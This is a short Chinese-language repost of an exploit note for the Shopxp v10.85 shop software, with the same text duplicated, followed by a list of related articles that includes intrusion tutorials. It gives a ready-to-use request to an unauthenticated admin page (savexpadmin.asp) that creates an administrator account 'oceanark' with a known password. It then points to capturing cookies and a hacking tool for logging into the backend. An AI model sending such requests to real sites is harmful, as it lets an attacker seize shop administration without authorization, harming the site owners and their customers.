Shopxp-v10.85 CRSF攻击远程添加管理漏洞
2016-07-13 23:45
323 查看
影响版本:Shopxp-v10.85
官方网站:http://www.shopxp.cn
漏洞类型:验证错误
漏洞描述:savexpadmin.asp添加管理员页未进行身份验证。
利用方法:外部提交数据
http://127.0.0.1/admin/savexpadmin.asp?action=add&admin2=oceanark&password2=oceanark&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1
增加用户:oceanark密码为oceanark的用户
登入后台:
http://127.0.0.1/upfilepic_getimg.asp
抓取cookies使用明小子动感购物商城提交
官方网站:http://www.shopxp.cn
漏洞类型:验证错误
漏洞描述:savexpadmin.asp添加管理员页未进行身份验证。
利用方法:外部提交数据
http://127.0.0.1/admin/savexpadmin.asp?action=add&admin2=oceanark&password2=oceanark&Submit2=%CC%ED%BC%D3%B9%DC%C0%ED%D4%B1
增加用户:oceanark密码为oceanark的用户
登入后台:
http://127.0.0.1/upfilepic_getimg.asp
抓取cookies使用明小子动感购物商城提交
相关文章推荐
- 黑鹰VIP教程-脚本入侵班全部提供下载
- 非常不错的脚本入侵基础知识总结第1/2页
- XXOO 传说90黑阔论坛
- asp.dll解析成system提升权限
- 使用Adsutil.vbs脚本获取IIS配置信息及账号密码
- 脚本入侵 手工注入ASP
- Fckeditor漏洞利用方法总结
- linux中vim编译器的使用
- ShellExecute与ShellExecuteEx的用法
- Percona-Galera-Monitoring-Template监控模板说明
- RunLoop
- Linux下安装jsoncpp
- 【poj1857】To Europe! To Europe! DP
- 监控Linux性能的18个命令行工具
- PhotoShop教程:制作玻璃水晶质感文字
- Linux中的可用内存指的是什么?
- 透明ico图标制作方法
- 利用IIS日志追查网站入侵者
- python与shell通过微信企业号发送消息
- error LNK2001: unresolved external symbol __imp__fopen